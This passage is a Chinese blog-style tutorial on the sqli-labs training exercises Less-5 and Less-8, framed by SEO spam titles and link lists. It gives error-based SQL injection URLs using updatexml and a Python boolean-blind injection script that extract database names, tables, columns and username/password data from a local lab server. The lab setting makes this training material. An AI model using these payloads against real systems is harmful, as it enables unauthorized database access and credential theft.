当前位置: 首页 > news >正文

在门户网站管理建设工作讲话品牌互动营销案例

在门户网站管理建设工作讲话,品牌互动营销案例,做网站有发展吗,google play商店sqllabs5:(报错注入) ?id1 回显You are in........... ?id2-1 回显You are in........... ?id1 回显 1 LIMIT 0,1 判断是字符型#xff0c;闭合。?id1order by 3-- //页面显示正常我们试了4行得出是报错注入 我们先爆库名 http://127.0.0.1/sqli-labs-master/L…sqllabs5:(报错注入) ?id1 回显You are in........... ?id2-1 回显You are in........... ?id1 回显 1 LIMIT 0,1 判断是字符型闭合。?id1order by 3-- //页面显示正常我们试了4行得出是报错注入 我们先爆库名 http://127.0.0.1/sqli-labs-master/Less-5/?idand updatexml(1,concat(0x7e,(select database()),0x7e),3)-- 拿下库名:security 爆表名 http://127.0.0.1/sqli-labs-master/Less-5/?id-1%27%20and%20updatexml(1,concat(0x7e,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema%27security%27)),1)%20-- 拿下表名 然后爆字段 http://127.0.0.1/sqli-labs-master/Less-5/?id-1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_nameusers and table_schemasecurity)),1) --爆数据 http://127.0.0.1/sqli-labs-master/Less-5/?id-1 and updatexml(1,concat(0x7e,(select group_concat(username,0x7e,password) from users)),1) -- 数据不完整因为updatexml()函数的报错内容不超过32个字符所以我们还需要对数据进行处理 使用substring()函数对结果字符进行处理 ?id-1 and updatexml(1,concat(0x7e,substring((select group_concat(username,0x7e,password) from users),32,64)),1) -- 之后我们就可以不断改变位置这样我们就可以得到所有数据后续的操作不再演示 sqllabs8:布尔盲注 报错注入被注释掉了 联合查询只出现you are in .......... 所以这里我们能看见一真一假页面特征 不加时为真 http://127.0.0.1/sqli-labs-master/Less-8/?id1 加入时为假 http://127.0.0.1/sqli-labs-master/Less-8/?id1 我们可以用布尔盲注 我们数据库名 securitys的ascii码是115我们可以一个一个试一试 http://127.0.0.1/sqli-labs-master/Less-8//?id1 and ascii(substring((select database()),1,1))115-- 利用二分法和ASCII码进行渗透 根据此现象我们写一个python脚本快速进行注入 import time import requestsurl http://127.0.0.1/sqli-labs-master/Less-8/index.phpdef inject_database(url):name for i in range(1, 50):low 32high 128mid (low high) // 2while low high:payload 1 and ascii(substr(database(), %d, 1)) %d-- % (i, mid)res {id: payload}# start_time time.time()r requests.get(url, paramsres)# end_time time.time()if You are in........... in r.text:low mid 1else:high midmid (low high) // 2if mid 32:breakname name chr(mid)print(name)inject_database(url) 爆库名; 爆表名 payload 1 and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schemadatabase()), %d, 1)) %d-- % (i, mid) 爆列名 payload 1 and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schemadatabase() and table_nameusers), %d, 1)) %d-- % (i, mid) 爆数据 payload 1 and ascii(substr((select group_concat(username,$,password) from users), %d, 1)) %d-- % (i, mid)
http://www.dnsts.com.cn/news/159710.html

相关文章:

  • 南阳卧龙区网站建设哪家好阿里巴巴运营每天必做
  • 免费模板做网站网站改版死链接
  • tornado网站开发南京高固建设公司
  • php玩具公司网站源码会所网站模板
  • 中国建设银行青岛分行网站网站优化 代码优化
  • 涡阳网站建设哪家好网站域名解析设置
  • 邯郸网站建设报价小程序分销怎么做好分销
  • 2015年做哪些网站致富wordpress能做小程序
  • 集团网站设计思路互联网站备案信息查询
  • 烟台福山网站建设免费网络游戏大全
  • 苏州建站网站模板wordpress菜单绑定模板
  • 东莞网站建设什么价格便宜wordpress主题 demo
  • 网站开发使用什么语言app网站开发多少钱
  • 常州免费企业网站建设官网cms系统
  • 如何做网站的逻辑结构图南通市优普网站建设
  • 彭水网站建设南皮县网站建设价格
  • 做网站可以不写代码wordpress 快捷键
  • 网站建设费用属于什么科目买卖平台有哪些网站
  • 网站系统功能描述帝国网站模版
  • 深圳网站设计工资一般多少wordpress运行代码
  • 怎么提高网站的收录深圳石岩做网站
  • php网站开发实例视频网站图片上传却不显示不出来
  • 做代练去什么网站安全怎么查看Wordpress根目录
  • 西安网站开发公司哪家强班级网站开发环境
  • php源码 个人网站家在深圳光明
  • 佛山建企业网站一个购物交易网站怎么做
  • 售卖网站建设实验报告成都网站优化页面
  • 建设企业网站找谁网站描述是什么
  • 申请完域名如何建设网站wordpress底部音频
  • 网站开发行业新闻教育类app开发